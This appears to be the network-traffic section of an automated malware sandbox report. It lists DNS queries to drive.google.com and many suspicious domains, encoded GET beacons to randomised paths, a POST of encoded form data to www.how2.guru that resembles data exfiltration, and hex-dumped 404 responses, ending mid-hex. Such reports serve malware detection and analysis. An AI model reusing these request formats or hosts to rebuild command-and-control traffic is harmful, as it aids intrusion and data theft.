    Source: global trafficHTTP traffic detected: GET /rfuo/?Hh=g6BlO&2rul-=HttO6gilRPhQm5AaUYCTEe/GFzQ3JRW7tnq3sC1VQlloj67/9n3YrtONKlQmdJDOXt5dm9a5cNA5akyMA8hzjxd/lkJNPaGIP3HcLzqJj36WiuTl2EhOSjI= HTTP/1.1Host: www.gokulmohan.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /xb3p/?2rul-=+HG6aiFxTvlSzQoIs9ZJ3PSkAiypA9aaBhm9bacr778ozHX/qp3/mrPcWfQQ4m8pKd5uzW3Q1BNoTzb8AReS/5N/dAP+OtFAus01fnFx169lP7D5+vQ5ltg=&Hh=g6BlO HTTP/1.1Host: www.3bbfibre3app.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /3ld1/?Hh=g6BlO&2rul-=CxEsl70ByyFCVrEmQ1H576bbPcYyg9sIwSrFamSzPlGZOs8aE6QFujQOfXywaJwNxcqmSbu90P/WMPRiAk1blYMq9yYTo32NmbjkK65nzP/wEdpsGvsZrfc= HTTP/1.1Host: www.lichnyyrost.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /6fde/?2rul-=nbGTuLemKRTpMBhECM1mMcTVmibgynjed6008TvXOLJMhaVDWlSxtENlCtfhfXIYxXqpopSgMtQMvB67FBGeOiwcmCMnIoT/zPipv8Zc3bHdVtIwetv/s5E=&Hh=g6BlO HTTP/1.1Host: www.innovators.groupAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS+CBDl0e/03G6vIGgM2DOx4ZCTRM54bCOA7z+XcSGAiseRvin1n9lPpnkGa0LOYYd0oIGRqFGq723QGUcE=&Hh=g6BlO HTTP/1.1Host: www.caprinaday.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /7eim/?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO HTTP/1.1Host: www.how2.guruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /443n/?Hh=g6BlO&2rul-=SBUFO7UKbQxT/A0NMCw1slRydQol8mxlPD8CditPqx9i+IWA5JxkazMedHBluKiV/JkaYuM+MOSFojVsVdVmUJrzgHDhlyielwZPRH6/6joZww29waA6pwk= HTTP/1.1Host: www.ruarlo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /2x6z/?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO HTTP/1.1Host: www.refs4refs.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g= HTTP/1.1Host: www.estrela-b.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /13t3/?2rul-=OPGGyibZykz1HQ+fwNDr+1YpMJUD6qxq+hpAjJgj1ZR94MAkLt42BGXqMjTev/m9FIbjW4eTPcRZap/xAhCWotsEASV9n/5Kf2dVcxkz55MgVuVRQ72L8tA=&Hh=g6BlO HTTP/1.1Host: www.russe-trykk.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /u1q9/?Hh=g6BlO&2rul-=jd3Av2k5V8Eau16mgcfaPd8VebuAL1FcJ0MaInc68HOQ7ZBrvq4ejSFdl4VVlO0+8Eq38X9/B8LMXqH/bNKlbEK/GZjnRsE0t8/pdXuVmtOQpH7wXf7Q+zg= HTTP/1.1Host: www.1-mine.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /e0v8/?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO HTTP/1.1Host: www.binacamasala.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /n7zc/?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE= HTTP/1.1Host: www.wrl-llc.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficDNS traffic detected: DNS query: drive.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global trafficDNS traffic detected: DNS query: www.caprinaday.net
    Source: global trafficDNS traffic detected: DNS query: www.how2.guru
    Source: global trafficDNS traffic detected: DNS query: www.ruarlo.xyz
    Source: global trafficDNS traffic detected: DNS query: www.refs4refs.info
    Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
    Source: global trafficDNS traffic detected: DNS query: www.russe-trykk.online
    Source: global trafficDNS traffic detected: DNS query: www.1-mine.online
    Source: global trafficDNS traffic detected: DNS query: www.binacamasala.com
    Source: global trafficDNS traffic detected: DNS query: www.wrl-llc.net
    Source: global trafficDNS traffic detected: DNS query: www.xtelify.tech
    Source: global trafficDNS traffic detected: DNS query: www.bigliaserramenti.com
    Source: global trafficDNS traffic detected: DNS query: www.theawareness.shop
    Source: global trafficDNS traffic detected: DNS query: www.gokulmohan.online
    Source: global trafficDNS traffic detected: DNS query: www.3bbfibre3app.net
    Source: global trafficDNS traffic detected: DNS query: www.lichnyyrost.online
    Source: global trafficDNS traffic detected: DNS query: www.innovators.group
    Source: unknownHTTP traffic detected: POST /7eim/ HTTP/1.1Host: www.how2.guruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.how2.guruContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 202Referer: http://www.how2.guru/7eim/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)Data Raw: 32 72 75 6c 2d 3d 43 73 54 70 6c 46 6a 59 59 57 4e 37 30 79 66 6a 71 2f 67 56 53 70 39 34 35 4f 66 7a 72 6b 6b 55 76 35 57 4d 37 35 73 77 63 51 73 50 42 66 51 55 34 47 7a 68 69 39 67 4d 51 4f 79 48 53 6d 41 6c 6a 48 4e 50 61 2f 65 32 37 2b 4a 51 71 49 37 44 49 5a 2b 32 74 66 4f 58 64 54 4d 69 77 4b 67 61 6e 39 57 44 56 57 73 6c 4b 69 36 67 74 4b 5a 71 54 54 65 58 6a 76 63 77 48 79 63 65 6c 6e 43 31 37 52 74 49 59 74 79 54 62 71 55 6e 37 33 6d 49 47 73 72 68 39 6e 6c 64 43 65 62 79 39 6e 43 31 54 48 4e 4f 33 43 39 54 4f 76 63 53 4c 45 6a 4f 4e 43 68 75 36 7a 44 51 72 6d 31 46 39 44 35 62 43 67 3d 3d Data Ascii: 2rul-=CsTplFjYYWN70yfjq/gVSp945OfzrkkUv5WM75swcQsPBfQU4Gzhi9gMQOyHSmAljHNPa/e27+JQqI7DIZ+2tfOXdTMiwKgan9WDVWslKi6gtKZqTTeXjvcwHycelnC17RtIYtyTbqUn73mIGsrh9nldCeby9nC1THNO3C9TOvcSLEjONChu6zDQrm1F9D5bCg==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Wed, 23 Oct 2024 16:53:26 GMTConnection: closeContent-Length: 5096Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:53:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:53:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b 0e f3 bf e8 bd 74 d3 02 69 74 6d 39 8d 6c c3 8a 55 a4 0a f8 b1 45 e9 e0 8c 3c ac d8 d6 c0 04 fd 6d 17 a2 de 1e f8 a4 df dd 7a 52 86 37 a0 eb 86 e2 e7 cb e5 ae 19 56 e5 53 ed b4 2d cd a2 f4 5d 50 b2 8b c8 9e 7c 39 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 bd 75 